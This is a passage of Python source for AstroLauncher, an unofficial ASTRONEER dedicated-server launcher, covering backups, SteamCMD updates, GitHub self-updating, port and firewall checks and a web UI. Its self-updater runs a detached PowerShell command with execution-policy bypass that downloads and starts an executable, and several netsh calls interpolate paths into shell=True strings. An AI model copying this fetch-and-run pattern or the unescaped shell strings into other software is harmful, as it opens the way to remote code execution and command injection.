fileNames, key=os.path.getmtime, reverse=True)[0]
AstroLogging.logPrint(
f"Server saved. {os.path.basename(fileName)}", dwet="s")
except:
pass
# self.launcher.saveObserver.stop()
    class BackupHandler(FileSystemEventHandler):
        """Watchdog handler that copies the server's backup folder into
        the launcher's retention folder and prunes old retained copies."""

        def __init__(self, launcher):
            self.launcher = launcher
            self.astroPath = self.launcher.astroPath
            self.moveToPath = self.launcher.launcherConfig.BackupRetentionFolderLocation
            self.retentionPeriodHours = self.launcher.launcherConfig.BackupRetentionPeriodHours
            # Paths queued by on_deleted while one copy thread runs:
            self.pendingFiles = []
            super().__init__()

        def handle_files(self):
            """Copy current backups into the retention folder, delete
            retained copies older than the retention period, then restart
            the backup observer (which discards this handler)."""
            # Small delay lets a burst of filesystem events settle first:
            time.sleep(2)
            path = os.path.join(self.astroPath, self.moveToPath)
            try:
                if not os.path.exists(path):
                    os.makedirs(path)
            except Exception as e:
                AstroLogging.logPrint(e, "error")
            # Prune retained files older than the retention period:
            now = time.time()
            try:
                for f in os.listdir(path):
                    fpath = os.path.join(path, f)
                    if os.stat(fpath).st_mtime < (now - (self.retentionPeriodHours * 60 * 60)):
                        os.remove(fpath)
            except Exception as e:
                AstroLogging.logPrint(e, "error")
            AstroLogging.logPrint(
                "Copying backup(s) to retention folder.", dwet="b")
            # Copy every file currently in the watched backup directory:
            try:
                dirName = os.path.dirname(self.pendingFiles[0])
                fileNames = [os.path.join(dirName, f) for f in os.listdir(
                    dirName) if os.path.isfile(os.path.join(dirName, f))]
                for cFile in fileNames:
                    shutil.copy2(cFile, path)
            except FileNotFoundError as e:
                AstroLogging.logPrint(e, "error")
            except Exception as e:
                AstroLogging.logPrint(e, "error")
            # Restart the observer so a fresh handler (with an empty
            # pending list) takes over:
            self.launcher.backupObserver.stop()
            self.launcher.backup_retention()

        def on_deleted(self, event):
            """Queue the path; only the first event of a burst starts the
            copy thread, later events just extend the pending list."""
            try:
                self.pendingFiles.append(event.src_path)
                if len(self.pendingFiles) == 1:
                    t = Thread(target=self.handle_files, args=())
                    t.daemon = True
                    t.start()
            except:
                pass
    def __init__(self, astroPath, launcherINI="Launcher.ini", disable_auto_update=None):
        """Locate (or install) the dedicated server, load the launcher
        config, start the support services (webhook loop, web server,
        save/backup observers) and finally launch the server.

        astroPath: directory containing AstroServer.exe, or None to search
            the current directory / attempt an install.
        launcherINI: path of the launcher config file.
        disable_auto_update: when not None, overrides (inverted) the
            AutoUpdateLauncherSoftware config option.
        """
        AstroLogging.setup_logging()
        self.launcherINI = launcherINI
        self.launcherConfig = self.LauncherConfig()
        self.launcherPath = os.getcwd()
        self.refresh_launcher_config()
        # check if path specified
        if astroPath is not None:
            if os.path.exists(os.path.join(astroPath, "AstroServer.exe")):
                self.astroPath = astroPath
            else:
                AstroLogging.logPrint(
                    "Specified path does not contain the server executable! (AstroServer.exe)", "critical")
                time.sleep(5)
                return
        # check if executable in current directory
        elif os.path.exists(os.path.join(os.getcwd(), "AstroServer.exe")):
            self.astroPath = os.getcwd()
        else:
            AstroLogging.logPrint(
                "Unable to find server executable anywhere! (AstroServer.exe)", "warning")
            # finally, try to install the server
            try:
                if astroPath is None:
                    self.astroPath = os.getcwd()
                self.check_for_server_update()
            except Exception as e:
                AstroLogging.logPrint(e, "critical")
                return
        # AstroRequests.checkProxies()
        # Configure Discord webhook logging; unknown levels fall back to "cmd":
        AstroLogging.discordWebhookURL = self.launcherConfig.DiscordWebHookURL
        dwhl = self.launcherConfig.DiscordWebHookLevel.lower()
        dwhl = dwhl if dwhl in ("all", "cmd", "chat") else "cmd"
        AstroLogging.discordWebhookLevel = dwhl
        self.start_WebHookLoop()
        AstroLogging.setup_loggingPath(
            astroPath=self.astroPath, logRetention=int(self.launcherConfig.LogRetentionDays))
        if disable_auto_update is not None:
            self.launcherConfig.AutoUpdateLauncherSoftware = not disable_auto_update
        self.version = ALVERSION
        # Print the ASCII-art banner only if the terminal is wide enough:
        colsize = os.get_terminal_size().columns
        if colsize >= 77:
            vText = "Version " + self.version[1:]
            # pylint: disable=anomalous-backslash-in-string
            print(" __________________________________________________________________________\n" +
                  "|               _           _                            _                 |\n" +
                  "|    /_\\ ___| |_ _ _ ___ | | __ _ _ _ _ _ __ | |_ ___ _ _ |\n" +
                  "|   / _ \\ (_-<| _|| '_|/ _ \\ | |__ / _` || || || ' \\ / _|| ' \\ / -_)| '_| |\n" +
                  "|  /_/ \\_\\/__/ \\__||_| \\___/ |____|\\__,_| \\_,_||_||_|\\__||_||_|\\___||_| |\n" +
                  "|                                                                          |\n" +
                  "|"+vText.center(74)+"|\n" +
                  "|__________________________________________________________________________|")
        AstroLogging.logPrint(
            f"AstroLauncher - Unofficial Dedicated Server Launcher {self.version}")
        AstroLogging.logPrint(
            "If you encounter any bugs please open a new issue at:")
        AstroLogging.logPrint(
            "https://github.com/ricky-davis/AstroLauncher/issues")
        AstroLogging.logPrint(
            "To safely stop the launcher and server press CTRL+C")
        self.latestURL = "https://github.com/ricky-davis/AstroLauncher/releases/latest"
        # Detect whether we are running as a frozen (pyinstaller) executable:
        bName = os.path.basename(sys.executable)
        if sys.argv[0] == os.path.splitext(bName)[0]:
            self.isExecutable = True
        else:
            self.isExecutable = os.path.samefile(sys.executable, sys.argv[0])
        self.cur_server_version = "0.0"
        self.headers = AstroAPI.base_headers
        self.DaemonProcess = None
        self.saveObserver = None
        self.backupObserver = None
        self.hasUpdate = False
        self.is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
        # Pin the launcher process to the configured CPU cores, if any:
        self.affinity = self.launcherConfig.CPUAffinity
        try:
            if self.affinity != "":
                affinityList = [int(x.strip())
                                for x in self.affinity.split(',')]
                p = psutil.Process()
                p.cpu_affinity(affinityList)
        except ValueError as e:
            AstroLogging.logPrint(f"CPU Affinity Error: {e}", "critical")
            AstroLogging.logPrint(
                "Please correct this in your launcher config", "critical")
            return
        self.check_for_server_update()
        self.DedicatedServer = AstroDedicatedServer(
            self.astroPath, self)
        self.check_for_launcher_update()
        AstroLogging.logPrint("Starting a new session")
        self.validate_playfab_certs()
        self.check_ports_free()
        if self.launcherConfig.AdminAutoConfigureFirewall:
            self.configure_firewall()
        if not self.launcherConfig.DisableNetworkCheck:
            AstroLogging.logPrint("Checking the network configuration..")
            self.check_network_config()
        self.save_reporting()
        if not self.launcherConfig.DisableBackupRetention:
            self.backup_retention()
            AstroLogging.logPrint("Backup retention started")
        # setup queue for data exchange
        self.webServer = None
        if not self.launcherConfig.DisableWebServer:
            # start http server
            self.webServer = self.start_WebServer()
            self.start_InfoLoop()
            # AstroLogging.logPrint(
            #     f"HTTP Server started at 127.0.0.1:{self.launcherConfig.WebServerPort}")
        if self.launcherConfig.HideLauncherConsoleWindow:
            # hide window
            AstroLogging.logPrint(
                "HideLauncherConsoleWindow enabled, Hiding window in 5 seconds...")
            time.sleep(5)
            # pylint: disable=redefined-outer-name
            kernel32 = ctypes.WinDLL('kernel32')
            user32 = ctypes.WinDLL('user32')
            hWnd = kernel32.GetConsoleWindow()
            user32.ShowWindow(hWnd, 0)
        self.start_server(firstLaunch=True)
def save_reporting(self):
    """Start (or restart) a watchdog Observer on the live savegame folder.

    If a previous observer exists but its thread has died, it is discarded
    and the method recurses once to build a fresh one. New save files are
    handled by ``self.SaveHandler`` (declared elsewhere on this class).
    """
    if self.saveObserver:
        if not self.saveObserver.is_alive():
            # Observer thread died; drop it and recurse to rebuild.
            self.saveObserver = None
            self.save_reporting()
    else:
        self.saveObserver = Observer()
        saveGamePath = r"Astro\Saved\SaveGames"
        watchPath = os.path.join(
            self.astroPath, saveGamePath)
        try:
            # The save folder may not exist yet on a fresh install.
            if not os.path.exists(watchPath):
                os.makedirs(watchPath)
        except Exception as e:
            AstroLogging.logPrint(e)
        # Fix: daemonize the observer thread so it cannot keep the launcher
        # process alive on shutdown. backup_retention() already does this
        # for its observer; this makes the two watchers consistent.
        self.saveObserver.daemon = True
        self.saveObserver.schedule(
            self.SaveHandler(self), watchPath)
        self.saveObserver.start()
def backup_retention(self):
    """Ensure a watchdog Observer is running on the backup savegame folder.

    A dead observer thread is discarded and replaced via one recursive
    call; otherwise a new daemonized observer is scheduled with
    ``self.BackupHandler``.
    """
    if self.backupObserver:
        if not self.backupObserver.is_alive():
            self.backupObserver = None
            self.backup_retention()
        return
    self.backupObserver = Observer()
    watchPath = os.path.join(
        self.astroPath, r"Astro\Saved\Backup\SaveGames")
    try:
        # Create the watched folder up front; a fresh server may lack it.
        if not os.path.exists(watchPath):
            os.makedirs(watchPath)
    except Exception as e:
        AstroLogging.logPrint(e)
    # Daemon thread: must not block launcher shutdown.
    self.backupObserver.daemon = True
    self.backupObserver.schedule(
        self.BackupHandler(self), watchPath)
    self.backupObserver.start()
def refresh_launcher_config(self, lcfg=None):
    """Reload launcher settings, apply them, and rewrite the INI on disk.

    Unknown keys (not declared on the LauncherConfig dataclass) are
    silently dropped before applying and persisting.
    """
    field_names = {f.name for f in dataclasses.fields(self.LauncherConfig)}
    raw_settings = self.get_launcher_config(lcfg)
    cleaned_config = {key: value
                      for key, value in raw_settings.items()
                      if key in field_names}
    self.launcherConfig = dataclasses.replace(
        self.launcherConfig, **cleaned_config)
    config = MultiConfig()
    config.read_dict({"AstroLauncher": cleaned_config})
    with open(self.launcherINI, 'w') as configfile:
        config.write(configfile)
def overwrite_launcher_config(self, ovrDict):
    """Force the given key/value settings into the launcher INI on disk."""
    MultiConfig().overwrite_with(
        self.launcherINI, {"AstroLauncher": ovrDict})
def get_launcher_config(self, lfcg=None):
    """Return the AstroLauncher section of the INI, baselined on defaults.

    lfcg: an optional LauncherConfig instance supplying defaults; a fresh
    default instance is used when falsy.
    """
    if not lfcg:
        lfcg = self.LauncherConfig()
    baseConfig = {"AstroLauncher": dataclasses.asdict(lfcg)}
    merged = MultiConfig().baseline(self.launcherINI, baseConfig)
    return merged.getdict()['AstroLauncher']
def validate_playfab_certs(self):
    """Hit the Playfab API once via PowerShell to validate/warm TLS certs.

    Using Invoke-WebRequest routes the request through the Windows
    certificate store; all output is discarded.
    """
    AstroLogging.logPrint("Attempting to validate Playfab Certs")
    playfabRequestCommand = ["powershell", '-executionpolicy', 'bypass', '-command',
                             'Invoke-WebRequest -uri https://5ea1.playfabapi.com/ -UseBasicParsing']
    # Idiom fix: subprocess.DEVNULL replaces the manual open(os.devnull)
    # file handle, which is exactly what DEVNULL exists for.
    proc = subprocess.Popen(
        playfabRequestCommand,
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    proc.communicate()
def update_server(self, latest_version):
    """Download/refresh the dedicated server via SteamCMD and install it.

    Bootstraps steamcmd.exe (downloading steamcmd.zip if needed), runs
    ``app_update 728470`` into SteamCMD's staging folder, then copies the
    result over ``self.astroPath``.  Progress is tracked through a small
    state file ``update.p`` ("download" -> "transfer" -> "complete") so an
    interrupted update can be detected on the next launch.
    """
    updateLocation = os.path.join(
        self.astroPath, 'steamcmd', 'steamapps', 'common', 'ASTRONEER Dedicated Server')
    steamcmdFolder = os.path.join(self.astroPath, "steamcmd")
    steamcmdExe = os.path.join(steamcmdFolder, "steamcmd.exe")
    steamcmdZip = os.path.join(self.astroPath, "steamcmd.zip")
    try:
        # Bootstrap SteamCMD next to the server if it was never installed.
        if not os.path.exists(steamcmdFolder):
            if not os.path.exists(steamcmdExe):
                if not os.path.exists(steamcmdZip):
                    url = "https://steamcdn-a.akamaihd.net/client/installer/steamcmd.zip"
                    r = (AstroRequests.get(url)).read()
                    with open(steamcmdZip, 'wb') as f:
                        f.write(r)
                with zipfile.ZipFile(steamcmdZip, 'r') as zip_ref:
                    zip_ref.extractall(steamcmdFolder)
        update_downloaded = False
        if os.path.exists(updateLocation):
            upd_version = "0.0"
            try:
                # build.version ends with a timestamp; the last 10 chars
                # are stripped to leave the bare version string.
                with open(os.path.join(updateLocation, "build.version"), "r") as f:
                    upd_version = (f.readline())[:-10]
                if upd_version == latest_version:
                    update_downloaded = True
            except:
                # Unreadable/partial staging dir: discard and re-download.
                try:
                    shutil.rmtree(updateLocation)
                except:
                    pass
        if not update_downloaded:
            # Record that a download is in progress (crash recovery marker).
            open("update.p", "wb").write(b"download")
            if os.path.exists(steamcmdExe):
                try:
                    os.remove(steamcmdZip)
                except:
                    pass
            AstroLogging.logPrint(
                f"AUTOMATICALLY UPDATING SERVER TO {latest_version}...")
            try:
                updateCMD = [steamcmdExe, '+login anonymous',
                             '+app_update 728470', 'validate', '+quit']
                update = subprocess.Popen(
                    updateCMD, creationflags=subprocess.DETACHED_PROCESS)
                # Poll instead of wait() so interrupts can reach us.
                while update.poll() is None:
                    time.sleep(0.1)
            except Exception as e:
                # Make sure SteamCMD and any children are dead before bailing.
                for child in psutil.Process(update.pid).children():
                    try:
                        child.kill()
                    except:
                        pass
                try:
                    update.kill()
                except:
                    pass
                raise Exception("") from e
            upd_version = "0.0"
            try:
                with open(os.path.join(updateLocation, "build.version"), "r") as f:
                    upd_version = (f.readline())[:-10]
            except:
                pass
            if upd_version == latest_version:
                update_downloaded = True
        if update_downloaded:
            # Copy the staged install over the live server directory.
            open("update.p", "wb").write(b"transfer")
            dir_util.copy_tree(updateLocation, self.astroPath)
            open("update.p", "wb").write(b"complete")
            cur_version = "0.0"
            with open(os.path.join(self.astroPath, "build.version"), "r") as f:
                cur_version = (f.readline())[:-10]
            if cur_version == latest_version:
                AstroLogging.logPrint(
                    f"UPDATE TO {latest_version} SUCCESSFUL.")
                # Success: remove the zip, state marker and staging dir.
                steamcmdZip = os.path.join(self.astroPath, "steamcmd.zip")
                if os.path.exists(steamcmdZip):
                    os.remove(steamcmdZip)
                try:
                    os.remove("update.p")
                except:
                    pass
                try:
                    shutil.rmtree(updateLocation)
                except:
                    pass
    except:  # Exception as e:
        AstroLogging.logPrint(
            f"UPDATE TO {latest_version} FAILED.", "warning")
def check_for_server_update(self, serverStart=False, check_only=False):
    """Check whether a newer dedicated-server build is available.

    Compares the local ``build.version`` against the version reported by
    the servercheck endpoint; a missing install, a missing
    ``AstroServer.exe``, or an interrupted update (stale ``update.p``)
    also counts as needing an update.

    Returns (True, latest_version) when an update is needed (after
    triggering it unless check_only), implicitly ``None`` when up to
    date, and (False, "0.0") on failure — preserved historical contract.
    """
    try:
        # Respect the "don't update on server restart" setting.
        if not self.launcherConfig.UpdateOnServerRestart and serverStart:
            return
        needs_update = False
        update_status = None
        if os.path.exists("update.p"):
            with open("update.p", "r") as f:
                update_status = f.read()
            # Bug fix: update_server() writes the literal "complete", but
            # this previously compared against "completed", so a leftover
            # state file from a finished update always forced a re-update.
            if update_status != "complete":
                needs_update = True
        cur_version = "0.0"
        try:
            # build.version ends with a 10-char timestamp; strip it.
            with open(os.path.join(self.astroPath, "build.version"), "r") as f:
                cur_version = (f.readline())[:-10]
        except OSError:
            pass
        if cur_version == "0.0":
            needs_update = True
        url = "https://servercheck.spycibot.com/stats"
        data = json.load(AstroRequests.get(url))
        latest_version = data['LatestVersion']
        if version.parse(latest_version) > version.parse(cur_version):
            needs_update = True
        if not os.path.exists(os.path.join(self.astroPath, "AstroServer.exe")):
            needs_update = True
        if needs_update:
            AstroLogging.logPrint(
                f"SERVER UPDATE AVAILABLE: {cur_version} -> {latest_version}", "warning")
            if self.launcherConfig.AutoUpdateServerSoftware and not check_only:
                self.update_server(latest_version)
            return True, latest_version
        cur_version = "0.0"
        with open(os.path.join(self.astroPath, "build.version"), "r") as f:
            cur_version = (f.readline())[:-10]
        self.cur_server_version = cur_version
    except Exception as e:
        # Fix: route the error through the logger instead of a stray print().
        AstroLogging.logPrint(
            f"Failed to check if update is available ({e})", "warning")
        return False, "0.0"
def check_for_launcher_update(self, serverStart=False):
    """Query GitHub for the latest launcher release; self-update if allowed."""
    releases_url = ("https://api.github.com/repos/"
                    "ricky-davis/AstroLauncher/releases/latest")
    try:
        release_data = json.load(AstroRequests.get(releases_url))
        latestVersion = release_data['tag_name']
        if version.parse(latestVersion) <= version.parse(self.version):
            return
        self.hasUpdate = latestVersion
        AstroLogging.logPrint(
            f"UPDATE: There is a newer version of the launcher out! {latestVersion}")
        AstroLogging.logPrint(f"Download it at {self.latestURL}")
        auto_update_enabled = self.launcherConfig.AutoUpdateLauncherSoftware
        if serverStart and not self.launcherConfig.UpdateOnServerRestart:
            return
        if self.isExecutable and auto_update_enabled:
            self.autoupdate_launcher(release_data)
    except:
        AstroLogging.logPrint(
            "Could not determine if new update exists.", msgType="debug")
def autoupdate_launcher(self, data):
    """Self-update the launcher executable from a GitHub release payload.

    For each release asset, spawns a detached PowerShell that waits for
    this process to exit, downloads the new exe next to the current one,
    swaps it into place, and relaunches it.  Finally asks the dedicated
    server to shut down so the swap can proceed.

    data: the GitHub "latest release" JSON; must contain an 'assets' list
    with 'browser_download_url' / 'name' entries.
    """
    x = data
    downloadFolder = os.path.dirname(sys.executable)
    for fileObj in x['assets']:
        downloadURL = fileObj['browser_download_url']
        fileName = (os.path.splitext(fileObj['name'])[0])
        downloadPath = os.path.join(downloadFolder, fileName)
        # PowerShell one-liner: wait on our PID, force TLS 1.2, download to
        # "<name>_new.exe", move it over "<name>.exe", start the new exe.
        downloadCMD = ["powershell", '-executionpolicy', 'bypass', '-command',
                       'Write-Host "Downloading latest AstroLauncher.exe..";', 'wait-process', str(
                           os.getpid()), ';',
                       '[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;',
                       "$ProgressPreference = 'SilentlyContinue';",
                       'Invoke-WebRequest', f"'{downloadURL}'", "-OutFile", f"'{downloadPath + '_new.exe'}'", ';',
                       "Move-Item", "-path", f"'{downloadPath + '_new.exe'}'", "-destination", f"'{downloadPath + '.exe'}'", "-Force;",
                       'Write-Host "Download complete!";',
                       'Start-Process', f"'{downloadPath + '.exe'}'"]
        # Detached so the updater survives this process's death.
        subprocess.Popen(downloadCMD, shell=True, creationflags=subprocess.DETACHED_PROCESS,
                         stdin=None, stdout=None, stderr=None, close_fds=True)
    # Give the updater a moment to start, then stop the server so the
    # launcher process can exit and be replaced.
    time.sleep(2)
    self.DedicatedServer.kill_server("Auto-Update")
# pylint: disable=unused-argument
def signal_handler(self, sig, frame):
    """SIGINT handler: save the game, then stop the dedicated server."""
    self.DedicatedServer.kill_server(
        reason="Launcher shutting down via signal", save=True)
def start_server(self, firstLaunch=False):
    """
    Starts the Dedicated Server process and waits for it to be registered
    with Playfab, then hands control to the server loop.

    firstLaunch: True only on initial boot — installs atexit/SIGINT
    shutdown hooks.  On relaunch the launcher re-checks for updates and
    rebuilds the AstroDedicatedServer wrapper instead.
    Returns False on any fatal startup failure; otherwise does not return
    until the server loop ends.
    """
    if firstLaunch:
        # Ensure the server is saved+stopped however the launcher dies.
        atexit.register(self.DedicatedServer.kill_server,
                        reason="Launcher shutting down via exit",
                        save=True)
        signal.signal(signal.SIGINT, self.signal_handler)
    else:
        self.check_for_server_update(serverStart=True)
        self.check_for_launcher_update(serverStart=True)
        self.DedicatedServer = AstroDedicatedServer(
            self.astroPath, self)
    self.DedicatedServer.status = "starting"
    self.DedicatedServer.busy = False
    # Playfab needs an XAuth token; retry forever (network may be down).
    gxAuth = None
    while gxAuth is None:
        try:
            gxAuth = AstroAPI.generate_XAUTH(
                self.DedicatedServer.settings.ServerGuid)
        except:
            AstroLogging.logPrint(
                "Unable to generate XAuth token... Are you connected to the internet?", msgType="warning")
            time.sleep(5)
    self.headers['X-Authorization'] = gxAuth
    # Deregister stale Playfab entries so a NEW LobbyID marks registration.
    oldLobbyIDs = self.DedicatedServer.deregister_all_server()
    AstroLogging.logPrint("Starting Server process...")
    if self.launcherConfig.EnableAutoRestart:
        AstroLogging.logPrint(
            f"Next restart is at {self.DedicatedServer.nextRestartTime}")
    startTime = time.time()
    try:
        self.DedicatedServer.start()
    except:
        AstroLogging.logPrint(
            "Unable to launch AstroServer.exe", "critical")
        return False
    # Wait up to ~10s (40 x 0.25s, less on errors) for the process handle
    # to become pollable.
    reachableProcess = None
    pcounter = 40
    while not reachableProcess:
        try:
            reachableProcess = not bool(
                self.DedicatedServer.process.poll())
            pcounter -= 1
            time.sleep(0.25)
        except:
            pcounter -= 2
            time.sleep(0.5)
        if pcounter <= 0:
            AstroLogging.logPrint(
                "Unable to start Server Process after 10 seconds!", "critical")
            return False
    AstroLogging.logPrint(
        f"Server started ( {self.cur_server_version} )! Getting ready....", ovrDWHL=True)
    try:
        self.DaemonProcess = AstroDaemon.launch(
            executable=self.isExecutable, consolePID=self.DedicatedServer.process.pid)
    except:
        AstroLogging.logPrint(
            "Unable to start watcher daemon", "warning")
        return False
    # Wait for server to finish registering with Playfab.
    serverData = None
    oPFF = self.launcherConfig.PlayfabAPIFrequency  # restored after backoff
    while not self.DedicatedServer.registered:
        AstroLogging.logPrint("Waiting for server to register...", "debug")
        try:
            serverData = (AstroAPI.get_server(
                self.DedicatedServer.ipPortCombo, self.headers))
            serverData = serverData['data']['Games']
            lobbyIDs = [x['LobbyID'] for x in serverData]
            # Registration is detected by a LobbyID not seen before
            # deregistration.
            if len(set(lobbyIDs) - set(oldLobbyIDs)) == 0:
                time.sleep(self.launcherConfig.PlayfabAPIFrequency)
            else:
                now = time.time()
                # Require >15s uptime before trusting the new entry.
                if now - startTime > 15:
                    serverData = serverData[0]
                    self.DedicatedServer.registered = True
                    oldLobbyIDs = None
                    self.DedicatedServer.LobbyID = serverData['LobbyID']
            if self.DedicatedServer.process.poll() is not None:
                AstroLogging.logPrint(
                    "Server was forcefully closed before registration. Exiting....")
                return False
        except KeyboardInterrupt:
            self.DedicatedServer.kill_server(
                "Launcher shutting down via KeyboardInterrupt")
        except:
            # Likely Playfab rate limiting: back off the poll frequency
            # (capped at 30s) and retry.
            AstroLogging.logPrint(
                "Failed to check server. Probably hit rate limit. Backing off and trying again...")
            if self.launcherConfig.PlayfabAPIFrequency < 30:
                self.launcherConfig.PlayfabAPIFrequency += 1
            time.sleep(self.launcherConfig.PlayfabAPIFrequency)
    self.launcherConfig.PlayfabAPIFrequency = oPFF
    self.DedicatedServer.serverData = serverData
    doneTime = time.time()
    elapsed = doneTime - startTime
    AstroLogging.logPrint(
        f"Server ready! Took {round(elapsed,2)} seconds to register.", ovrDWHL=True)
    self.DedicatedServer.status = "ready"
    self.DedicatedServer.server_loop()
def check_ports_free(self):
    """Verify the server (UDP), console (TCP) and web (TCP) ports are free.

    Logs a critical message per occupied port and shuts the launcher
    down when any of them is already in use.
    """
    def port_in_use(port, tcp=True):
        # Scan live inet connections for a matching local port + socket type.
        wanted_type = socket.SOCK_STREAM if tcp else socket.SOCK_DGRAM
        return any(conn.laddr[1] == port
                   for conn in psutil.net_connections('inet')
                   if conn.type == wanted_type)

    sp = int(self.DedicatedServer.settings.Port)
    cp = int(self.DedicatedServer.settings.ConsolePort)
    wp = int(self.launcherConfig.WebServerPort)
    serverPort = port_in_use(sp, False)
    consolePort = port_in_use(cp)
    webPort = (not self.launcherConfig.DisableWebServer) and port_in_use(wp)
    if serverPort:
        AstroLogging.logPrint(
            f"A process is already using your Server Port ( {sp} UDP )", "critical")
    if consolePort:
        AstroLogging.logPrint(
            f"A process is already using your Console Port ( {cp} TCP )", "critical")
    if webPort:
        AstroLogging.logPrint(
            f"A process is already using your Web Port ( {wp} TCP )", "critical")
    if serverPort or consolePort or webPort:
        self.kill_launcher()
def configure_firewall(self):
    """Ensure Windows Firewall inbound allow-rules exist for the server
    exe, the launcher exe, and the web UI port.

    Only acts when the current firewall profile is ON.  Without admin
    rights it can merely detect missing rules and warn; with admin rights
    it (re)creates any missing rule via netsh.
    """
    if not self.launcherConfig.AdminAutoConfigureFirewall:
        return
    ALRule = None           # launcher exe rule (checked only when frozen exe)
    ALWRule = None          # web-UI port rule
    ASRule = None           # astroserver exe rule
    launcherEXEPath = None
    isFirewallEnabled = None
    with os.popen(
            'netsh advfirewall show currentprofile | findstr /L "State" | findstr /L "ON"') as fwCheck:
        isFirewallEnabled = fwCheck.read()
    if isFirewallEnabled:
        serverExePath = os.path.join(
            self.astroPath, 'astro\\binaries\\win64\\astroserver-win64-shipping.exe')
        # Non-empty findstr output means a rule for this exact path exists.
        ASRule = os.popen(
            f'netsh advfirewall firewall show rule name=astroserver-win64-shipping.exe verbose | findstr /L "{serverExePath}"').read()
        if self.isExecutable:
            launcherEXEPath = os.path.join(os.getcwd(), sys.argv[0])
            ALRule = os.popen(
                f'netsh advfirewall firewall show rule name=astrolauncher.exe verbose | findstr /L "{launcherEXEPath}"').read()
        if not self.launcherConfig.DisableWebServer:
            ALWRule = os.popen(
                f'netsh advfirewall firewall show rule name=AstroLauncherWeb | findstr /L "{self.launcherConfig.WebServerPort}"').read()
        if not self.is_admin:
            # Not elevated: can only warn about missing rules.
            if (not ASRule)\
                    or (self.isExecutable and not ALRule)\
                    or (not self.launcherConfig.DisableWebServer and self.isExecutable and not ALWRule):
                AstroLogging.logPrint(
                    "Could not find firewall settings! Please relaunch as Administrator.", "warning")
        else:
            newRules = False
            if not ASRule:
                newRules = True
                # Delete-then-add keeps exactly one rule per program path.
                subprocess.call(
                    f'netsh advfirewall firewall delete rule name=astroserver-win64-shipping.exe dir=in program="{serverExePath}"' +
                    f'& netsh advfirewall firewall add rule name=astroserver-win64-shipping.exe dir=in action=allow program="{serverExePath}"',
                    shell=True,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL
                )
            if self.isExecutable:
                if not ALRule:
                    newRules = True
                    subprocess.call(
                        f'netsh advfirewall firewall delete rule name=astrolauncher.exe dir=in program="{launcherEXEPath}"' +
                        f'& netsh advfirewall firewall add rule name=astrolauncher.exe dir=in action=allow program="{launcherEXEPath}"',
                        shell=True,
                        stdout=subprocess.DEVNULL,
                        stderr=subprocess.DEVNULL
                    )
            if not self.launcherConfig.DisableWebServer and not ALWRule:
                newRules = True
                subprocess.call(
                    f'netsh advfirewall firewall delete rule name=AstroLauncherWeb dir=in protocol=TCP localport={self.launcherConfig.WebServerPort}' +
                    f'& netsh advfirewall firewall add rule name=AstroLauncherWeb dir=in action=allow protocol=TCP localport={self.launcherConfig.WebServerPort}',
                    shell=True,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL
                )
            if newRules:
                AstroLogging.logPrint(
                    "Setting custom firewall rules...")
def check_network_config(self):
    """Probe local/remote reachability of the game port and warn about
    common NAT / port-forwarding misconfigurations.

    Also warns loudly when the RCON console port is reachable from the
    internet, since that would let anybody control the server.
    """
    localTest = ValidateSettings.test_network(
        self.DedicatedServer.settings.PublicIP, int(self.DedicatedServer.settings.Port), False)
    remoteTest = ValidateSettings.test_nonlocal(
        self.DedicatedServer.settings.PublicIP, int(self.DedicatedServer.settings.Port))
    # [local reachability, remote reachability]
    testMatrix = [localTest, remoteTest]
    if testMatrix == [True, True]:
        AstroLogging.logPrint("Server network configuration good!")
    elif testMatrix == [False, True]:
        # Internet-visible but not LAN-visible: classic NAT-loopback issue.
        AstroLogging.logPrint(
            "Your server is not accessible from your local network.", "warning")
        AstroLogging.logPrint(
            "This usually indicates an issue with NAT Loopback", "warning")
        AstroLogging.logPrint(
            "See if your router supports it, or setup your server with playit.gg", "warning")
        AstroLogging.logPrint(
            "Guide to setting up playit.gg (11:28): https://youtu.be/SdLNFowq8WI?t=688", "warning")
    elif testMatrix == [True, False]:
        # LAN-visible only: loopback adapter or missing port forward.
        AstroLogging.logPrint(
            "Your server can be seen locally, but not remotely.", "warning")
        AstroLogging.logPrint(
            "This usually means you have a Loopback adapter that needs to be disabled", "warning")
        AstroLogging.logPrint(
            "and that you may need to Port Forward/open your firewall.", "warning")
    elif testMatrix == [False, False]:
        AstroLogging.logPrint(
            "The server is completely unreachable!", "warning")
        AstroLogging.logPrint(
            f"Please port forward {self.DedicatedServer.settings.Port} UDP and ensure the firewall settings are correct.", "warning")
    # Console port SHOULD be unreachable; "correct" = test fails.
    rconNetworkCorrect = not (ValidateSettings.test_network(
        self.DedicatedServer.settings.PublicIP, int(self.DedicatedServer.settings.ConsolePort), True))
    if rconNetworkCorrect:
        AstroLogging.logPrint("Remote Console network configuration good!")
    else:
        AstroLogging.logPrint(
            f"SECURITY ALERT: Your console port ({self.DedicatedServer.settings.ConsolePort}) is Port Forwarded!", "warning")
        AstroLogging.logPrint(
            "SECURITY ALERT: This allows anybody to control your server.", "warning")
        AstroLogging.logPrint(
            "SECURITY ALERT: Disable this ASAP to prevent issues.", "warning")
        # Pause so the operator actually sees the alert.
        time.sleep(5)
def start_WebServer(self):
    """Launch the web UI on a daemon thread and return the server object."""
    webServer = AstroWebServer.WebServer(self)

    def run_in_thread():
        # On Python 3.8+ Windows needs the selector event-loop policy
        # before a fresh loop is installed for this thread.
        if sys.version_info.minor > 7:
            asyncio.set_event_loop_policy(
                asyncio.WindowsSelectorEventLoopPolicy())
        asyncio.set_event_loop(asyncio.new_event_loop())
        webServer.run()

    serverThread = Thread(target=run_in_thread, daemon=True)
    serverThread.start()
    return webServer
def autoUpdate_websockets_Loop(self):
    """Forever: once a second, push updates to all web-UI websocket clients."""
    while True:
        time.sleep(1)
        self.webServer.iterWebSocketConnections()
def start_InfoLoop(self):
    """Run the websocket auto-update loop on a background daemon thread."""
    def info_loop_worker(launcher):
        # Same Windows event-loop setup as the web server thread.
        if sys.version_info.minor > 7:
            asyncio.set_event_loop_policy(
                asyncio.WindowsSelectorEventLoopPolicy())
        asyncio.set_event_loop(asyncio.new_event_loop())
        launcher.autoUpdate_websockets_Loop()

    worker = Thread(target=info_loop_worker, args=(self,), daemon=True)
    worker.start()
def kill_launcher(self):
    """Wait ~5s for logs to flush, then hard-kill children and this process."""
    time.sleep(5)
    try:
        me = psutil.Process(os.getpid())
        for child in me.children():
            child.kill()
    except:
